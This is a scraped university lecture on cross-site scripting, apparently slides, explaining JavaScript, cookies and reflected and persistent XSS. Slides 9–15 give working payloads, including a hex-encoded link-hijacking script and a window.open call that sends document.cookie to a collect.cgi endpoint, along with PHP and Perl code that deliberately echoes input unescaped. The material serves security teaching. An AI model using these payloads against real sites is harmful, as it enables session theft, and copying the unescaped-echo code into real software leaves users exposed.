Presentation is loading. Please wait.

Presentation is loading. Please wait.

Cross Site Scripting (XSS) Attack Chien-Chung Shen

Published byHortense Blankenship Modified over 8 years ago

Similar presentations

Presentation on theme: "Cross Site Scripting (XSS) Attack Chien-Chung Shen"— Presentation transcript:

1 Cross Site Scripting (XSS) Attack Chien-Chung Shen cshen@cis.udel.edu

2 JavaScript (1) JavaScript is meant specifically for browser-side computing JavaScript is not allowed to interact with the local file system JavaScript started out as a scripting language executed in browser for browser detection and form verification –To ensure that a web page is optimized separately for both the Internet Explorer and Firefox, a web server may deliver a page that contains both ways of displaying an HTML object optimally — with the expectation that JavaScript would first figure out which browser was being used and then execute only those commands that are appropriate to that browser JavaScript is now widely used for producing mouse-rollover, animation, and other effects in web pages JavaScript is an object based language in the sense that it uses the dot operator to invoke methods on objects Objects in JavaScript can be of types: object, function, and array; When a variable is assigned an instance of one of these types, what the variable is set to is a reference to the instance

3 JavaScript (2) The most important object of type object in JavaScript is window An instance of type window stands for the browser window that is currently open Every window object contains an instance of type screen, an instance of type navigator, an instance of type location, an instance of type history, an instance of type document, an in- stance of type self, and an instance of type frames The document object is very special because it represents the content of a web page The document object maintains a DOM (Document Object Model) representation of the contents of a web document as a tree of nodes –An HTML document can be easily represented by a tree. The root node for every HTML document is the html element; Descending from this root are two child nodes, head and body

4 JavaScript (3) The document object, which represents all of the contents of a web page in the form of a DOM (Document Object Model) tree, has a number of very important methods defined for it that allow you to manipulate and animate the different elements in a web page For instance, suppose you want to pull into your JavaScript all of the paragraphs in your web page that you defined with the “ p ” elements, you can do so by invoking var allParas = document.getElementsByTagName(’p’) where var allParas means that we are defining allParas as a variable. This variable will be set to the array that is returned by the call to the method getElementsByTagName() of the document object

5 Managing Cookies with JavaScript Cookies are used to retain some data (state) from one session to another between a browser and a web server Enterprise web servers often use cookies stored in browsers to keep track of interaction with their online customers from one visit to the next –In this manner, after a new client has been authenticated with, say, a password on the first contact, the cookies can be relied upon for subsequent automatic authentications –Cookies can also be used to store customer preferences, tracking how customers view a web page, and so on –Tools -> Page Info -> Cookies It may be possible for third parties to steal cookies from an innocent client’s browser by mounting cross-site scripting attack

6 How JavaScript Set/Change Cookies Example: WealthTracker.html (by Prof. Avi Kak @ Purdue) Downloading web page WealthTracker.html from the server constitutes one session –Enter a string for your name and an integer for your wealth, and then click on the submit button. When you click on the Submit button the first time, the browser will show you for verification the information you just entered in the form –Now just change the number in the “Wealth” box and see what happens. And do this repeatedly. You will see that this page keeps track of how many times you have visited the page in the past and how your wealth has changed from one visit to the next All JavaScript code in web page is in the form of function definitions. A JavaScript function may be executed automatically upon the occurrence of an event or because it has been called in code that is currently being executed All JavaScript appears between and tags Between and tags, HTML creates a web form with two text boxes, one for name and the other for wealth

7 How JavaScript Set/Change Cookies Enter your name and the size of your wealth in this form: Your Name (Required) : <input id="yournamebox” name="yourname” type="text" /> Size of Your Wealth: This form is not supposed to send anything back to server –to ensure form data will NOT be sent back to server by setting action to ‘ # ’ –to supply client-side function to process form data by making it value of onSubmit attribute; when user clicks on “Submit” button of form, whatever the user entered in form will be processed by JavaScript method checkEntry() (which returns false to prevent form from being sent to server) –value of method does not matter

8 How JavaScript Set/Change Cookies function getSetCookie(name, info) { var all_cookies = document.cookie.split(';'); var cooky = ''; var nam = ''; var val = ''; for (i=0;i < all_cookies.length;i++) { cooky = all_cookies[i].split('='); nam = cooky[0].replace(/^\s+|\s+$/g, ''); if (nam == name) { val = unescape( cooky[1].replace(/^\s+|\s+$/g, '') ); val_parts = val.split('_'); var howManyVisits = Number(val_parts[0]); var visit_portion = val_parts[1]; var prev_info = val_parts[2]; if (prev_info) { var diff = info - prev_info; var msg = "This is your visit number " + (howManyVisits + 1) + ". " + "Your wealth changed by " + diff; alert(msg); } var newCookieVal = (howManyVisits + 1) + '_' + visit_portion + '_' + info; setCookie( name, newCookieVal, 15 ); } else { var cookieValue = "1_visits" + '_' + info; setCookie( name, cookieValue, 15 ); } A cookie consists of “name=value” pairs

9 XSS Attack (1) User visits specially crafted link (URL) by attacker When user visits the link, the crafted code will get executed by the user’s browser Query-string in URL: ?name=value&name=value… –passed on to an application program at web server –this is how your search request is conveyed to search engine like Google For instance, index.php <?php $name = $_GET['name']; echo "Welcome $name "; echo " Click to Download "; ?> http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld alert('a ttacked') http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld alert('a ttacked') When victim loads the above URL into browser, he will see an alert box which says ‘attacked’

10 XSS Attack (2) For instance, index.php <?php $name = $_GET['name']; echo "Welcome $name "; echo " Click to Download "; ?> Attacker can now try to change “target URL” of link “ Click to Download ” http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld window.o nload = function() {var link=document.getElementsByTagName("a");link[0].href="http://attacker- site.com/";} Call the function to execute on “ window.onload ” Because the website (i.e, index.php) first echos the given name and then only it draws the tag

11 XSS Attack (3) Normally an attacker tends not to craft URL which human can directly read. So attacker will encode ASCII characters to hex as follows http://www.cis.udel.edu/~cshen/index.php?name=%48%65%6c%6c%57%6f%72%6c%6 4 % 3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%2 0%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%6 3%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%6 1%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%7 4%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%2 2%3b%7d%3c%2f%73%63%72%69%70%74%3e Now victim may not know what it is, because directly he cannot understand that the URL is crafted and there is a more chance that he can visit the URL.

12 Stealing Cookies via XSS Attack (1) Client-side XSS takes the form of attacker gets an innocent victim to click on a carefully crafted URL to a web server. Unknowingly to the victim, this URL carries a query-string portion with embedded JavaScript code that is designed to send the cookies stored in the client’s browser for web server’s domain to the attacker’s machine Convert WealthTracker.html into a CGI script named WealthTracker.cgi, a Perl executable file that spits out HTML that is sent to browser requesting this page Put WealthTracker.cgi in /usr/lib/cgi-bin http:// /cgi-bin/WealthTracker.cgi http:// /cgi-bin/WealthTracker.cgi?name= alert(“Hello from a cookie stealer“);

13 Stealing Cookies via XSS Attack (2) my $forminfo = ''; $forminfo = $ENV{QUERY_STRING}; $forminfo =~ tr/+/ /; $forminfo =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg; #$forminfo =~ s/ //g; print "$forminfo"; Echo back to browser a query string if it is found attached to URL received from the browser http:// /cgi-bin/WealthTracker.cgi?name= alert(document.cookie); Query string name= alert(document.cookie); This query string would be echoed back by the server to the browser and the browser would ordinarily process the JavaScript in the value of the string –Display cookie(s) in browser

14 Stealing Cookies via XSS Attack (3) An evil attacker lures victims with the following URL http:// /cgi- bin/WealthTracker.cgi??name= window.open("http:// /cgi- bin/collect.cgi?cookie="%2Bdocument.cookie) Attacker has a web server running on machine www.cis.udel.edu and its cgi-bin includes a script called collect.cgi that simply collects the information sent to by the browser on the victim machine because of JavaScript code in the query-string portion of the URL. Now the attacker would be able to harvest cookies in the victim’s browser for the WealthTracker.cgi web site

15 Stealing Cookies via XSS Attack (4) my $forminfo = ''; $forminfo = $ENV{QUERY_STRING}; $forminfo =~ tr/+/ /; $forminfo =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg; #$forminfo =~ s/ //g; print "$forminfo"; echo back to browser a query string if it is found attached to URL received from the browser a clueless client has engaged in a session with this web page assume that the same client has received a very authentic looking email that lures him/her into clicking on a link that points to the following URL 1.http:// /cgi-bin/WealthTracker.cgi?name= alert(document.cookie); 2.http:// /cgi-bin/WealthTracker.cgi?name= alert("Hello from a cookie stealer"); 3.http:// /cgi-bin/WealthTracker.cgi?name= window.open( "http://www.cis.udel.edu/cgi-bin/collect.cgi?cookie="%2Bdocument.cookie)

16 CGI in Apache2 (1) Add the following directive into file /etc/apache2/sites-enabled/000-default ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all

17 CGI in Apache2 (2) To test cgi, put the following hello.cgi inside /usr/lib/cgi-bin/ #!/usr/bin/perl print "Content-type:text/html\r\n\r\n"; print ' '; print ' Hello Word - First CGI Program '; print ' '; print ' Hello Word! This is my first CGI program '; print ' '; Then do sudo chown root:root hello.cgi sudo chmod 755 hello.cgi Open Firefox on your VM, input localhost/cgi-bin/hello.cgi It shows "Hello Word! This is my first CGI program”.

18 Persistent XSS Attack (1) The code injected by attacker will be stored in a secondary storage device (mostly on a database) Session –HTTP protocol is stateless, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other –Once user has authenticated himself, the web server should not ask the username/password for the next request from the user –To do this, they need to maintain some kind of states between the web-browser and web-server which is done through “Sessions” –When user login for the first time, a session ID will be created by web server and it will be sent to web-browser as “cookie” –All sub-sequent requests to web server, will be based on the “session id” in the cookie

19 Persistent XSS Attack (2) Demonstration: –There are two types of users: “Admin” and “Normal”. When “Admin” log-in, he can see the list of usernames. When “Normal” users log-in, they can only update their display name

Download ppt "Cross Site Scripting (XSS) Attack Chien-Chung Shen"

Similar presentations

PHP Form and File Handling

PHP Form and File Handling
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
PHP I.

PHP I.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?

WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
JavaScript and AJAX Jonathan Foss University of Warwick

JavaScript and AJAX Jonathan Foss University of Warwick
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
The Web Warrior Guide to Web Design Technologies

The Web Warrior Guide to Web Design Technologies
Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.

Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.
XP Browser and E-mail Basics1. XP Browser and E-mail Basics2 Learn about Web browser software and Web pages The Web is a collection of files that reside.

XP Browser and Basics1. XP Browser and Basics2 Learn about Web browser software and Web pages The Web is a collection of files that reside.
JavaScript Forms Form Validation Cookies CGI Programs.

JavaScript Forms Form Validation Cookies CGI Programs.
Servlets and a little bit of Web Services Russell Beale.

Servlets and a little bit of Web Services Russell Beale.
1 The World Wide Web. 2  Web Fundamentals  Pages are defined by the Hypertext Markup Language (HTML) and contain text, graphics, audio, video and software.

1 The World Wide Web. 2  Web Fundamentals  Pages are defined by the Hypertext Markup Language (HTML) and contain text, graphics, audio, video and software.
CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.

CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.
Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.

Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.

 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
McGraw-Hill/Irwin © 2004 by The McGraw-Hill Companies, Inc. All rights reserved. Beginning Active Server Pages Barry Sosinsky Valda Hilley Programming.

McGraw-Hill/Irwin © 2004 by The McGraw-Hill Companies, Inc. All rights reserved. Beginning Active Server Pages Barry Sosinsky Valda Hilley Programming.
Chapter 9 Collecting Data with Forms. A form on a web page consists of form objects such as text boxes or radio buttons into which users type information.

Chapter 9 Collecting Data with Forms. A form on a web page consists of form objects such as text boxes or radio buttons into which users type information.
JAVASCRIPT HOW TO PROGRAM -2 DR. JOHN P. ABRAHAM UTPA.

JAVASCRIPT HOW TO PROGRAM -2 DR. JOHN P. ABRAHAM UTPA.
MS3304: Week 4 PHP & HTML Forms. Overview HTML Forms elements refresher Sending data to a script via an HTML form –The post vs. get methods –Name value.

MS3304: Week 4 PHP & HTML Forms. Overview HTML Forms elements refresher Sending data to a script via an HTML form –The post vs. get methods –Name value.

Similar presentations

Ads by Google